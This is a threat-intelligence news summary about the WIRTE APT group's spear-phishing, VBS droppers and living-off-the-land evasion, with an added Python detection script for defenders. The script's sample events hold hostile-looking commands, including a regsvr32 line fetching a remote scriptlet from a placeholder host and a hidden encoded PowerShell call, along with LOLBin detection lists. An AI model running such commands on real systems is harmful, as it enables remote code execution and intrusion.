WIRTE APT Campaign Active Since 2019

WIRTE, a lesser-known threat actor, has been active since at least 2019. The group is suspected of being linked to the Gaza Cybergang, while its intrusion process resembles that of the MuddyWater group.

Who are the targets?

  • According to Kaspersky's Securelist threat report, the actor has targeted a wide range of industries, mostly in the Middle East. Affected entities are located in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.
  • Verticals hit include diplomatic and financial organizations, government bodies, law firms, military organizations, and technology companies.

Assessing the threat actor's intrusion process

  • The intrusion begins with spear-phishing emails written in Arabic, sometimes themed around Palestinian matters.
  • The emails carry documents which, if opened with macros enabled, run Visual Basic macros that launch a VB script downloader for the next-stage payload; in one case this dropper was named Ferocious dropper.
  • In some cases, researchers also observed a fake Kaspersky Update executable acting as the dropper for the VBS implant.

Evasion techniques modified

  • Since its inception, WIRTE has modified its toolset to stay stealthy for longer.
  • Living-off-the-land (LotL), abusing tools already present on the victim system instead of custom binaries, is one technique added to its toolset recently.
  • This suspected subgroup of the Gaza Cybergang has used this method to compromise victims with better OpSec than its suspected counterparts.
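The chain described in the two sections above, a macro-enabled document launching a VB script downloader, an executable posing as an updater doing the same, and later stages leaning on built-in Windows tools, is usually caught by parent/child process relationships rather than by file hashes. The following Python is an added example, not code from the Securelist report, from Cyware, or from WIRTE's tooling; it runs a handful of such rules over constructed Sysmon-style process-creation events. The field names, paths, file names and command lines are assumptions for illustration and should be mapped onto your own telemetry.

```python
"""Parent/child process heuristics for the macro -> script host -> LotL chain.

Added example, not from the Securelist report or WIRTE's tooling. The event
format mimics Sysmon Event ID 1 (process creation) but the field names are an
assumption; map them to your own telemetry. All events below are constructed.
"""
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\public\\", "\\downloads\\")

# Constructed sample telemetry: a benign document open, a macro-launched
# VBScript, a script-to-PowerShell hop, a LOLBin fetching a URL, a fake
# "updater" in Temp launching a script host, and a benign system event.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\a\Downloads\letter.docm"'},
    {"host": "ws-01", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //E:vbscript C:\Users\a\AppData\Local\Temp\inv.vbs"},
    {"host": "ws-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -nop -enc SQBFAFgA"},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s /n /u /i:https://example.invalid/a.sct scrobj.dll"},
    {"host": "ws-03", "parent_image": r"C:\Users\a\AppData\Local\Temp\update.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe C:\Users\a\AppData\Roaming\svc.vbs"},
    {"host": "ws-03", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"svchost.exe -k netsvcs"},
]


def basename(path: str) -> str:
    """Lower-cased file name, tolerating either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the first matching rule name, or None for an unremarkable event."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    cmd = event["command_line"].lower()
    parent_path = event["parent_image"].lower()

    # Rule 1: an Office application launching a script host or LOLBin is the
    # macro stage of the chain.
    if parent in OFFICE_PARENTS and child in (SCRIPT_HOSTS | LOLBINS):
        return "office_spawns_script_host"
    # Rule 2: one script host chaining into another (VBS -> PowerShell) is a
    # typical living-off-the-land hop once the dropper has landed.
    if parent in SCRIPT_HOSTS and child in (SCRIPT_HOSTS | LOLBINS):
        return "script_host_chain"
    # Rule 3: a signed LOLBin handed a URL on its command line is fetching
    # remote content; legitimate use of these switches with URLs is rare.
    if child in LOLBINS and ("http://" in cmd or "https://" in cmd):
        return "lolbin_fetches_url"
    # Rule 4: an executable running from a user-writable path that spawns a
    # script host (the fake-updater-as-dropper pattern).
    if child in SCRIPT_HOSTS and any(m in parent_path for m in USER_WRITABLE):
        return "user_writable_parent_spawns_script_host"
    return None


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(host, rule, command_line) for every event that trips a rule."""
    hits = []
    for e in events:
        rule = classify(e)
        if rule:
            hits.append((e["host"], rule, e["command_line"]))
    return hits


if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
```

Rule 1 alone would catch the macro stage; rules 2 to 4 matter because the later stages deliberately look like routine administration, which is the point of the LotL tradecraft described above. In production, allow-list the specific command lines your own management tooling generates rather than whole binaries, since exempting wscript.exe or regsvr32.exe outright reopens the gap.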

Conclusion

It is notable that WIRTE operators have relied on simple, common TTPs to stay under the radar for years. Researchers nonetheless expect this alleged new subgroup of the Gaza Cybergang to expand its presence by adopting updated and stealthier TTPs.

Source: https://cyware.com/news/wirte-apt-campaign-active-since-2019-058761e4

Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved Website by Top Search SEO